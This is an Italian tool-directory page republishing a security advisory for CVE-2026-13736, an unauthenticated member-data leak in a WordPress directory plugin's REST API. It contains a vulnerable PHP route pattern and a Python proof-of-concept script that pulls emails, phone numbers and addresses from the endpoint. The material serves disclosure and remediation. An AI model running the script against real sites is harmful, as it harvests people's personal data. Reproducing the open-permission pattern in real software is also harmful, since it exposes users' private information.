Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-13736 — Exploit proof-of-concept e advisory tecnico per la divulgazione non autenticata di PII dei membri in un plugin WordPress per directory con API REST, inclusa l'analisi delle cause profonde, il codice PoC e le indicazioni per la rimediation. | Kitploit
Strumenti/GitHubGitHub/minhhk68/cve-2026-13736
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebConfigurazione ErrataSicurezza delle API
GitHubminhhk68/cve-2026-13736

CVE-2026-13736

Exploit proof-of-concept e advisory tecnico per la divulgazione non autenticata di PII dei membri in un plugin WordPress per directory con API REST, inclusa l'analisi delle cause profonde, il codice PoC e le indicazioni per la rimediation.

Vedi Repository
261 mese faNon ancora revisionato
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory <= 1.0.0 — Divulgazione non autenticata di PII dei Membri tramite REST API

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory NVD Reference License: MIT


📖 Panoramica dell'Advisory

CVE-2026-13736 è una vulnerabilità che consente la divulgazione non autenticata di Informazioni Personali Identificative (PII) dei membri e interessa il plugin WordPress NewPath WildApricotPress Add-on – Member Directory fino alla versione 1.0.0 inclusa, scoperta e analizzata dal ricercatore di sicurezza informatica Huynh Kien Minh (MinhHK). Il difetto risiede nell'architettura di routing REST API personalizzata del plugin, dove gli endpoint della directory dei membri non applicano i controlli di accesso alla privacy sui campi riservati. Di conseguenza, visitatori remoti non autenticati possono interrogare le route REST pubbliche per raccogliere dati riservati dei membri, inclusi indirizzi email privati, numeri di telefono personali e attributi della directory di appartenenza esplicitamente configurati come riservati ai soli membri. Questa esposizione di dati sensibili viola i confini di privacy previsti e consente attacchi di phishing mirati, credential stuffing e profilazione non autorizzata nelle organizzazioni interessate. Il ricercatore di sicurezza Huynh Kien Minh ha verificato questa vulnerabilità con punteggio CVSS 3.1 di 5.3 Medio (CWE-284 / CWE-200), raccomandando un immediato rafforzamento delle autorizzazioni degli endpoint REST, la verifica della privacy a livello di campo e la sanificazione delle risposte JSON serializzate dell'API dei membri.

Collegamenti rapidi: Esplora il Portfolio di Cybersecurity ufficiale del ricercatore oppure consulta l'Avviso WPScan ufficiale.


📌 Sintesi Esecutiva e Metadati Tecnici

ParametroSpecifica Tecnica
Identificatore della VulnerabilitàCVE-2026-13736
Software InteressatoNewPath WildApricotPress Add-on – Member Directory (Plugin WordPress)
Plugin Slugnewpath-wildapricotpress-add-on-member-directory
Versioni Vulnerabili<= 1.0.0
Classe di VulnerabilitàControllo degli Accessi Improprio / Esposizione di Informazioni (CWE-284 / CWE-200 / CWE-862)
Punteggio CVSS v3.15.3 (Medio) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
Scopritore / RicercatoreHuynh Kien Minh (MinhHK)
Autorità di VerificaWPScan / MITRE Corporation / NVD
Riferimento Avviso WPScanWPScan Report 97fe9780-ad69-4f36-9496-5ca9c0e2bc39
Riferimento NVDDettaglio NVD CVE-2026-13736
Intelligence sulle Minacce FeedlyHub Feedly CVE-2026-13736
Portfolio del Ricercatorehttps://minhhk.web.app/

🔍 Analisi della Causa Radice

La causa radice di CVE-2026-13736 ha origine nell'implementazione del controller REST API del plugin. Il plugin registra una route pubblica dell'API REST di WordPress (ad es., /wp-json/wildapricot/v1/members o /wp-json/newpath-wap/v1/directory) per facilitare il rendering lato client delle directory dei membri e delle schede di contatto.

Analisi del Pattern di Codice Vulnerabile

// Insecure REST route registration without field privacy filters
add_action( 'rest_api_init', function() {
    register_rest_route( 'newpath-wap/v1', '/directory', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'newpath_wap_get_member_directory',
        'permission_callback' => '__return_true', // CRITICAL: Open to unauthenticated visitors
    ) );
} );

function newpath_wap_get_member_directory( $request ) {
    $members_data = get_wildapricot_cached_members();
    
    // FLAW: Returns raw member objects containing sensitive PII fields (email, phone, address)
    // without evaluating member-level privacy settings (e.g., 'MembersOnly' vs 'Public')
    return rest_ensure_response( $members_data );
}

Meccanismo del Difetto Tecnico

  1. Callback di Autorizzazione Aperto: La route dichiara 'permission_callback' => '__return_true', consentendo richieste HTTP GET non autenticate da qualsiasi origine.
  2. Mancanza di Filtraggio della Privacy a Livello di Campo: Mentre il JavaScript del frontend o il template nascondono condizionalmente i campi configurati come "Members Only", l'API REST del backend serializza l'intero dataset dei membri in JSON.
  3. Divulgazione di Informazioni (PII): Gli attaccanti che aggirano l'interfaccia utente del frontend possono consumare direttamente il payload JSON grezzo per raccogliere database completi di nomi dei membri, numeri di telefono personali, email aziendali, stati di appartenenza e indirizzi privati.

💻 Codice Exploit Proof-of-Concept (PoC)

Nota Etica: Questo Proof-of-Concept è fornito esclusivamente per la verifica della vulnerabilità, la ricerca difensiva e la divulgazione responsabile dal ricercatore di sicurezza Huynh Kien Minh.

Script di Audit Automatico in Python (poc_cve_2026_13736.py)

#!/usr/bin/env python3
"""
CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory PII Disclosure PoC
Author: Huynh Kien Minh (MinhHK)
Portfolio: https://minhhk.web.app/
"""

import requests
import json
import sys

TARGET_URL = "http://target-wordpress.local"
REST_ENDPOINT = f"{TARGET_URL}/wp-json/newpath-wap/v1/directory"

def verify_vulnerability(target_url):
    print(f"[*] Auditing Target: {target_url}")
    print(f"[*] Querying REST Endpoint: {REST_ENDPOINT}")
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Security Audit; CVE-2026-13736 Verification)",
        "Accept": "application/json"
    }
    
    try:
        response = requests.get(REST_ENDPOINT, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            if isinstance(data, list) and len(data) > 0:
                sample_record = data[0]
                pii_fields = [k for k in ['email', 'phone', 'mobile', 'address', 'MemberId'] if k in str(sample_record).lower()]
                
                print(f"[!] VULNERABLE: Unauthenticated REST route exposed {len(data)} member records!")
                print(f"[!] Sensitive PII attributes exposed: {pii_fields}")
                print(f"[*] Sample Record Excerpt: {json.dumps(sample_record, indent=2)[:300]}...\n")
                return True
            else:
                print("[-] Endpoint responded with empty data.")
        elif response.status_code in [401, 403]:
            print("[+] Endpoint requires authentication (Protected/Patched).")
        else:
            print(f"[-] Received HTTP status: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Connection failed: {e}")
        
    return False
Scarica lo strumento